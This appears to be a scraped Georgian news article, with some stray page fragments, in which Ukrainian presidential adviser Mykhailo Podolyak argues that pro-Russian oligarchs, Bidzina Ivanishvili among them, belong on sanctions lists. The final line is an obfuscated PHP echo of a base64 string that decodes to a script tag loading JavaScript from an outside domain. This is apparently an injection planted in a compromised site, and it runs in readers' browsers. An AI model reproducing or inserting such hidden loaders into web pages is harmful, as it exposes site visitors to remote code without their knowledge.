celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტის მრჩეველის მიხაილ პოდოლიაკის განცხადებით, ნებისმიერი პრორუსი ოლიგარქი, განურჩევლად მისი ეროვნებისა,  სანქციების სიაში უნდა იყოს. ამის შესახებ მან რადიო "მაესტროსთან" ინტერვიუში ისაუბრა.
 
მისი თქმით, ყველა, ვინც ფულს შოულობს რუსეთის ფედერაციაში, სინამდვილეში  უკრაინაში ომის და უკრაინელი ხალხის მკვლელობის სპონსორები არიან.
 
"მე უბრალოდ განცხადება გავაკეთე იმის შესახებ, რომ ნებისმიერი პრორუსი ოლიგარქი, განურჩევლად მისი ეროვნებისა,  სანქციების სიაში უნდა იყოს.  საქართველოში არის ივანიშვილი, ჩვენ ერთმნიშვნელოვნად ვიცით, თქვენც და ჩვენც, რომ ეს ადამიანი რუსეთის ფედერაციაში შოულობს ფულს. ჩვენთვის ეს მიუღებელია. ეს ჩვენი საჯარო პოზიციაა. რომელიც აბსოლუტურად არგუმენტირებულია, რადგან ყველა, ვინც ფულს შოულობს რუსეთის ფედერაციაში, სინამდვილეში  უკრაინაში ომის და უკრაინელი ხალხის მკვლელობის სპონსორები არიან.  მე ვუსურვებდი რომ ყველას ესმოდეს, მათ შორის იმ სუბიექტებს, რომლებიც გაბრაზებული და შეურაცმხჰოფელი რიტორიკით საუბრობენ გააცნობიერონ, რომ ადრე თუ გვიან ომის შემდეგ ოლიგარქთან ერთად უკრაინაში ჩადენილი ყველა დანაშაულის თანადამფინანსებლად შეფასდებიან. 
 
ის დანაშაულები, რომლებიც  კიევის ოლქში იყო ჩადენილი, მასობრივი გაუპატიურებები და ბავშვების დახოცვა, ეს ყველაფერი იმათი პასუხისმგებლობა იქნება ვინც ამა თუ იმ ფორმით   რუსეთის ფედერაციასთან ერთად ფულს აკეთებენ. ამ თეზისების უარყოფა ძალიან რთულია, ეს ახსნას საჭიროებს, საერთოდ საუბარი  რატომ უნდა იყოს იმაზე, რომ რუსეთს უფლება აქვს  რამე გაყიდოს, რატომ უნდა იყოს საერთოდ საუბარი რუსეთთან ბიზნეს ურთიერთობებზე?! ამ კითხვებზე პასუხის გაცემა ხომ ძალიან რთულია? მათ შორის, ბატონ ივანიშვილისთვისაც?! ამიტომ უწევთ ემოციური, შეურაცხმყოფელი განცხადებების გაკეთება რომელიც  მათ არშემდგარობას აჩვენებს!" – განაცხადა პოდოლიაკმა.
 
ინტერვიუს სრული ვერსიის ნახვა შესაძლებელია აქ. 
1892
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");